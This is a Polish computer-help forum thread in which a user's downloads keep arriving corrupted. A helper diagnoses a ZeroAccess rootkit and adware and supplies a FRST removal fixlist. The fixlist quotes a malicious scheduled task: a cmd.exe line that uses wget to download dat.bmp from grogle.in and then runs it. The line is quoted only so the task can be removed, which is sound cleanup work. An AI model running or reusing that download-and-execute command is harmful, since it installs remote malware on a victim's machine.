Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek dla www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Windows 7 Ultimate - Każdy ściągnięty plik jest uszkodzony.

12 Lut 2015 08:56 1269 20
  • Poziom 13  
    Dzień dobry
    Zgłaszam się do Państwa z problemem z jakim sobie sam poradzić nie potrafię. Od kilku dni obojętnie jaki plik ściągnę z internetu - rar, zip, avi, mkv - jest uszkodzony. Przy plikach spakowanych błędy crc. System to Windows 7 Ultimate. Nie ma znaczenia jaką przeglądarką ściągam plik i czy używam akceleratora czy też nie. Bardzo często gdy spod Firefoxa wspomagam się DownThemAll to plik się normalnie ściąga, a gdy dochodzi do 100% to wyskakuje błąd brak dostępu do pliku. W innych akceleratorach jest podobnie.
    Robiłem MemTest całą noc, nie wyskoczył żaden błąd. Komputer uruchomiony z live'a Knoppixa ściąga normalnie te same pliki bez błędów.
  • Użytkownik usunął konto  
  • Poziom 43  
    Pokaż SMART dysku:
    www.hdsentinel.com
  • Poziom 13  
    Także o tym pomyślałem, miałem Kaspersky Internet Security, odinstalowałem i nadal to samo.

    Smart dysku zrobiłem programem CrystalDiskInfo, ponieważ Hard Disk Sentinel w zipie oczywiście uszkodzony.
    O to log z CDI:
    Spoiler:
    Cytat:

    ----------------------------------------------------------------------------
    CrystalDiskInfo 4.1.3 (C) 2008-2011 hiyohiyo
    Crystal Dew World : http://crystalmark.info/
    ----------------------------------------------------------------------------

    OS : Windows 7 Ultimate Edition SP1 [6.1 Build 7601] (x64)
    Date : 2015/02/12 9:19:15

    -- Controller Map ----------------------------------------------------------
    + Intel(R) 6 Series/C200 Series Chipset Family 2 port Serial ATA Storage Controller - 1C08 [ATA]
    + ATA Channel 0 (0)
    - TSSTcorp CDDVDW SH-222AB ATA Device
    + ATA Channel 1 (1)
    - WDC WD5000AAKS-00A7B0 ATA Device
    + Intel(R) 6 Series/C200 Series Chipset Family 4 port Serial ATA Storage Controller - 1C00 [ATA]
    - ATA Channel 0 (0)
    - ATA Channel 1 (1)
    + A80FZ53F IDE Controller [SCSI]
    - GXYRS 0XM3WXYN SCSI CdRom Device

    -- Disk List ---------------------------------------------------------------
    (1) WDC WD5000AAKS-00A7B0 : 500.1 GB [0-1-0, pd1]

    ----------------------------------------------------------------------------
    (1) WDC WD5000AAKS-00A7B0
    ----------------------------------------------------------------------------
    Model : WDC WD5000AAKS-00A7B0
    Firmware : 01.03B01
    Serial Number : WD-WMASY0713762
    Disk Size : 500.1 GB (8.4/137.4/500.1)
    Buffer Size : 16384 KB
    Queue Depth : 32
    # of Sectors : 976771055
    Rotation Rate : Unknown
    Interface : Serial ATA
    Major Version : ATA8-ACS
    Minor Version : ----
    Transfer Mode : SATA/300
    Power On Hours : 30847 hours
    Power On Count : 3039 count
    Temparature : 40 C (104 F)
    Health Status : Good
    Features : S.M.A.R.T., AAM, 48bit LBA, NCQ
    APM Level : ----
    AAM Level : 80FEh [ON]

    -- S.M.A.R.T. --------------------------------------------------------------
    ID Cur Wor Thr RawValues(6) Attribute Name
    01 200 200 _51 000000000012 Read Error Rate
    03 159 153 _21 000000001390 Spin-Up Time
    04 100 100 __0 00000000013B Start/Stop Count
    05 200 200 140 000000000000 Reallocated Sectors Count
    07 200 200 _51 000000000000 Seek Error Rate
    09 _58 _58 __0 00000000787F Power-On Hours
    0A 100 100 _51 000000000000 Spin Retry Count
    0B 100 100 _51 000000000000 Recalibration Retries
    0C _97 _97 __0 000000000BDF Power Cycle Count
    C0 199 199 __0 000000000323 Power-off Retract Count
    C1 199 199 __0 000000000BDF Load/Unload Cycle Count
    C2 107 _83 __0 000000000028 Temperature
    C4 200 200 __0 000000000000 Reallocation Event Count
    C5 200 200 __0 000000000000 Current Pending Sector Count
    C6 200 199 __0 000000000000 Uncorrectable Sector Count
    C7 200 200 __0 000000000000 UltraDMA CRC Error Count
    C8 200 200 _51 000000000000 Write Error Rate

    -- IDENTIFY_DEVICE ---------------------------------------------------------
    +0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
    000: 42 7A 3F FF C8 37 00 10 00 00 00 00 00 3F 00 00
    010: 00 00 00 00 20 20 20 20 20 57 44 2D 57 4D 41 53
    020: 59 30 37 31 33 37 36 32 00 00 80 00 00 32 30 31
    030: 2E 30 33 42 30 31 57 44 43 20 57 44 35 30 30 30
    040: 41 41 4B 53 2D 30 30 41 37 42 30 20 20 20 20 20
    050: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 80 10
    060: 00 00 2F 00 40 01 00 00 00 00 00 07 3F FF 00 10
    070: 00 3F FC 10 00 FB 01 10 FF FF 0F FF 00 00 00 07
    080: 00 03 00 78 00 78 00 78 00 78 00 00 00 00 00 00
    090: 00 00 00 00 00 00 00 1F 07 06 00 00 00 44 00 40
    0A0: 01 FE 00 00 74 6B 7F 61 41 23 74 69 BE 41 41 23
    0B0: 20 7F 00 39 00 39 00 00 FF FE 00 00 80 FE 00 00
    0C0: 00 00 00 00 00 00 00 00 57 EF 3A 38 00 00 00 00
    0D0: 00 00 00 00 00 00 00 00 50 01 4E E0 AB 32 A6 60
    0E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 10
    0F0: 40 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    100: 00 29 00 00 00 00 00 00 00 00 16 9D 00 00 00 00
    110: 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00
    120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    190: 00 00 00 00 00 00 00 00 00 00 00 00 30 3F 00 00
    1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    1B0: 00 00 00 00 00 00 00 00 00 00 00 00 10 0E 00 00
    1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    1D0: 00 00 00 00 00 01 10 00 00 00 00 00 00 00 00 00
    1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9C A5
  • Poziom 43  
    Dysk OK. Czym robiłeś test pamięci? Mam nadzieję, że nie tym narzędziem z Windows?
  • Poziom 13  
    Nie, pamięć testowałem ostatnią wersją MemTest uruchomionej z bootowalnego pendrive'a.
  • Użytkownik usunął konto  
  • Poziom 13  
    Właściwie nic nie robiłem, niczego nie instalowałem, a wszystko co zainstalowałem w przeciągu ostatnich 2 tygodni usunąłem. Nie pomogło. Mam wyłączone przywracanie punktów systemu więc nie mogę przywrócić.
  • Użytkownik usunął konto  
  • Spec od komputerów
    Masz zainfekowany system. W tym rootkit zeroaccess.

    Odinstaluj:
    HijackThis 1.99.1 (HKLM-x32\...\HijackThis) (Version: 1.99.1 - Soeperman Enterprises Ltd.)
    Java(TM) 6 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version:

    Uzyj: http://kb.eset.com/esetkb/index?page=content&id=SOLN2895&locale=en_US

    Zainstaluj http://ninite.com/java/

    Uzyj AdwCleaner, opcja Scan i Clean/Szukaj i Usun: https://toolslib.net/downloads/viewdownload/1-adwcleaner/

    Obok frst.exe utworz plik fixlist.txt z zawartoscia:
    Task: {03C68260-5896-4145-B84A-4FE3C774A55F} - System32\Tasks\BaiduBrowserUpdater => C:\Program Files (x86)\Baidu\BaiduBrowser\bdupdate.exe
    Task: {8140D0E4-6527-4451-8991-B54C758FC64E} - System32\Tasks\RegClean Pro => C:\Program Files (x86)\RegClean Pro\RegCleanPro.exe <==== ATTENTION
    Task: {88596D11-3916-479F-9E3C-9FC196BF04A5} - \PennyBee No Task File <==== ATTENTION
    Task: {E60ADD5E-0A99-4D64-BF8E-C1A1F297C6D7} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=88exZXvPzU;RStudio64.exe;1422173317 &amp; start cmd /R dat.bmp <==== ATTENTION
    Task: C:\Windows\Tasks\PennyBee.job => C:\Users\RafaBek\AppData\Roaming\PennyBee\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\Software\Classes\.exe: exefile => <===== ATTENTION!
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\Software\Classes\exefile: <===== ATTENTION!
    HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\$Recycle.Bin\S-1-5-21-3339245014-1138499547-4121908171-1000\$2dca9be92fa5c78b41d765b492767fe8\n. ATTENTION! ====> ZeroAccess?
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled ()
    BootExecute: sh4native Sh4Removal
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-page.com/web/?type=ds&ts...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-page.com/web/?type=ds&ts...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.delta-homes.com/web/?type=ds&am...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-3339245014-1138499547-4121908171-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.delta-homes.com/web/?type=ds&am...WD5000AAKS-00A7B0_WD-WMASY071376213762&q={searchTerms}
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-3339245014-1138499547-4121908171-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe http://www.delta-homes.com/?type=sc&ts=14...id=WDCXWD5000AAKS-00A7B0_WD-WMASY071376213762
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\delta-homes.xml
    FF HKLM-x32\...\Firefox\Extensions: [support@predictad.com] - C:\Program Files (x86)\AutocompletePro\support@predictad.com
    CHR Extension: (Treat Street Points Booster) - C:\Users\Rafałek\AppData\Local\Google\Chrome\User Data\Default\Extensions\bjghfenomheapmhmgdnedkakblopdicb [2014-07-31]
    S4 BaiduUpdater; C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe [X]
    S2 PennyBee; C:\Program Files (x86)\PennyBee\PennyBee.exe [X]
    U3 at3o5zsw; C:\Windows\System32\Drivers\at3o5zsw.sys [0 ] (Dawicontrol GmbH) <==== ATTENTION (zero size file/folder)
    S1 ArcSec; system32\drivers\ArcSec.sys [X]
    U4 CiSvc; No ImagePath
    S4 cpuz134; \??\C:\Users\Rafałek\AppData\Local\Temp\HBCD\PCWizard\pcwiz_x64.sys [X]
    S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
    S2 sbapifs; system32\DRIVERS\sbapifs.sys [X]
    S3 SliceDisk5; \??\C:\Users\Rafałek\AppData\Local\Temp\HBCD\PartitionFindAndMount\slicedisk-x64.sys [X]
    U4 srservice; No ImagePath
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    2015-02-11 09:36 - 2015-02-12 12:02 - 00024576 _____ () C:\ProgramData\dat.bmp
    2015-01-25 09:08 - 2015-01-25 09:08 - 00003402 _____ () C:\Windows\System32\Tasks\SYSTEM
    2015-01-25 09:07 - 2015-01-25 09:07 - 00401408 _____ () C:\ProgramData\wget.exe
    2015-02-12 11:51 - 2014-12-17 18:48 - 00000300 _____ () C:\Windows\Tasks\PennyBee.job
    2015-02-11 22:22 - 2014-12-17 15:19 - 00000000 ____D () C:\Program Files (x86)\AutocompletePro
    2015-01-23 13:35 - 2013-08-21 17:17 - 00000408 __RSH () C:\ProgramData\ntuser.pol
    2013-05-16 08:50 - 2013-05-16 08:50 - 0013942 _____ () C:\Program Files (x86)\Common Files\ccjs.ico
    2013-02-17 05:41 - 2013-02-17 05:41 - 0017542 _____ () C:\Program Files (x86)\Common Files\dyfm.ico
    2015-02-11 09:36 - 2015-02-12 12:02 - 0024576 _____ () C:\ProgramData\dat.bmp
    2015-01-25 09:07 - 2015-01-25 09:07 - 0401408 _____ () C:\ProgramData\wget.exe
    2012-09-01 16:13 - 2012-09-01 16:13 - 0000116 _____ () C:\ProgramData\{5FFDCEC3-E694-F71C-BCAC-3215-D32412E7}.ini
    C:\$Recycle.Bin\
    EmptyTemp:

    W FRST wybierz Fix.

    Zrob skan przy pomocy: http://www.freedrweb.com/cureit/?lng=pl

    Po wykonaniu daj nowe logi z FRST, ze skanowania.
  • Spec od komputerów
    Nowy Fixlist.txt dla FRST:
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled ()
    U3 ac5bsghh; C:\Windows\System32\Drivers\ac5bsghh.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero size file/folder)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled
    2015-02-12 14:54 - 2015-02-12 14:59 - 00000000 ____D () C:\AdwCleaner
    C:\Windows\igfxtray.exe
    Hosts:


    Czy pliki pobieraja sie juz poprawnie?
  • Poziom 13  
    Na 99% już wszystko jest ok, pobieram te same pliki i już nie ma błędów także bardzo mocno dziękuje.
    Korzystając jednak z okazji chciałbym prosić jak samemu sobie radzić w takich sytuacjach, jak interpretować te logi etc. W menadżerze zadań widziałem podejrzane mi procesy, usuwałem skojarzone do nich pliki, lecz jak widać na nie wiele to się stało.
  • Pomocny post
    Spec od komputerów
    Zeby sobie radzic samemu to trzeba sie na tym znac i miec doswiadczenie, w przeciwnym razie zostaje pisanie na forum.
  • Poziom 13  
    A jednak, niestety, nie jest ok.
  • Poziom 13  
    Cureit znalazł jednego wirusa, usunął go.
    TDSSKiller niczego nie znalazł.
    Obecnie podejrzewam, że wszystkiemu jest winien FF, bo FDM zaczął pobierać bez błędów.
    Sterowniki karty wykluczam, bo korzystam z wifi, lecz sprawdzałem także na ethernet i to samo.
    Z pod IE także jest dobrze.
  • Spec od komputerów
    Odinstaluj FF, usun katalog profilu przegladarki i zainstaluj ponownie.
  • Poziom 13  
    W weekend się tym zajmę.